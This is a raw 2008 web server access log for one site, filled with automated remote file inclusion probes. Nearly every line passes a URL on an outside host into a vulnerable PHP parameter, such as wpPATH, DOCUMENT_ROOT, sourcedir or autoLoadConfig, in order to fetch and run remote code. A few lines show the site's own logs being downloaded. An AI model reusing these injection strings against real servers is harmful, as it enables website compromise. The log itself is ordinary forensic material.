87.106.191.163 - - [29/Jul/2008:10:58:02 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test? HTTP/1.1" 200 18575 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:58:02 -0700] "GET /logs/access_080218.log/index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:58:38 -0700] "GET /logs/access_080207.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:58:38 -0700] "GET /logs/access_080117.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:10:58:43 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 18421 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:58:46 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:58:48 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:58:48 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:58:49 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.123.182.34 - - [29/Jul/2008:10:58:51 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:58:52 -0700] "GET /logs/access_080207.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:58:53 -0700] "GET /logs/access_080117.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:58:53 -0700] "GET //e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:58:53 -0700] "GET /logs/access.log//e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:10:58:54 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:58:54 -0700] "GET /logs/access_080207.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:58:54 -0700] "GET /logs/access_080117.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:58:56 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:58:57 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:58:58 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:58:58 -0700] "GET /logs/access.log/index.php?pg=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.28.93 - - [29/Jul/2008:10:58:58 -0700] "GET /samplefaqsupport.php?path[docroot]=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:59:00 -0700] "GET /index.php?pg=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:59:00 -0700] "GET /logs/index.php?pg=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:59:05 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:59:08 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:59:08 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:59:12 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:59:17 -0700] "GET /logs/access_080225.log/main.php?pg=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:59:17 -0700] "GET /main.php?pg=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:59:17 -0700] "GET /logs/main.php?pg=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:59:29 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:59:29 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:59:38 -0700] "GET /logs/access.log/join.php?DOCUMENT_ROOT=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:59:38 -0700] "GET /join.php?DOCUMENT_ROOT=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:59:39 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.43 - - [29/Jul/2008:11:00:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.43 - - [29/Jul/2008:11:00:01 -0700] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:00:04 -0700] "GET /logs/access.log/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:00:04 -0700] "GET /join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:00:05 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:00:22 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:00:23 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:00:24 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:00:24 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:00:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:00:27 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:00:37 -0700] "GET /logs/access_080123.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:00:40 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:00:40 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:00:45 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:00:45 -0700] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:00:45 -0700] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:00:45 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:00:46 -0700] "GET /logs/access_080225.log/main.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:00:46 -0700] "GET /main.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:00:46 -0700] "GET /logs/main.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:00:51 -0700] "GET /logs/access_080315.log/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:00:52 -0700] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:00:52 -0700] "GET /logs/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:01:09 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:01:09 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:01:50 -0700] "GET /logs/access_080123.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:01:54 -0700] "GET /logs/access_080123.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:01:58 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:01:58 -0700] "GET /logs/access.log/index.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:02:00 -0700] "GET /index.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 200 18389 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:02:01 -0700] "GET /logs/index.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:02:11 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:02:11 -0700] "GET //common/db.php?commonpath=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:02:11 -0700] "GET /logs//common/db.php?commonpath=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:11:02:15 -0700] "GET /logs/access.log/index.php?go=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:11:02:20 -0700] "GET /logs/access.log/index.php?go=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:11:02:20 -0700] "GET /index.php?go=http://www.concurs.org/tst.txt?? HTTP/1.1" 200 18379 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:02:20 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:02:21 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
192.192.35.235 - - [29/Jul/2008:11:02:22 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:11:02:24 -0700] "GET /logs/index.php?go=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:11:02:25 -0700] "GET /index.php?go=http://www.concurs.org/tst.txt?? HTTP/1.1" 200 18379 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:02:27 -0700] "GET /logs/access.log/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:02:27 -0700] "GET /logs/access.log/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:02:27 -0700] "GET /join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:02:27 -0700] "GET /admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:02:28 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:02:28 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:11:02:28 -0700] "GET /logs/index.php?go=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.29.46.195 - - [29/Jul/2008:11:02:33 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:02:56 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:02:57 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:02:57 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:02:57 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:03:07 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:03:10 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:03:54 -0700] "GET /logs/access_080313.log//claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:03:54 -0700] "GET /logs/access_080313.log//claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:03:54 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:03:54 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:03:55 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:03:55 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.114.163.184 - - [29/Jul/2008:11:04:07 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:04:10 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:04:11 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
92.114.163.184 - - [29/Jul/2008:11:04:12 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:04:13 -0700] "GET /logs/access_080401.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:04:19 -0700] "GET /logs/access_080219.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:11:04:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:04:26 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:04:26 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:04:28 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18353 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:04:28 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:04:30 -0700] "GET /logs/access_080309.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:04:30 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.24.5.54 - - [29/Jul/2008:11:04:31 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:04:32 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:04:33 -0700] "GET /logs/access_080310.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:11:04:50 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:04:51 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:04:51 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:04:53 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:04:54 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:04:54 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:04:55 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:04:56 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:04:59 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:05:02 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:05:02 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.810" "www.dmulk.com"
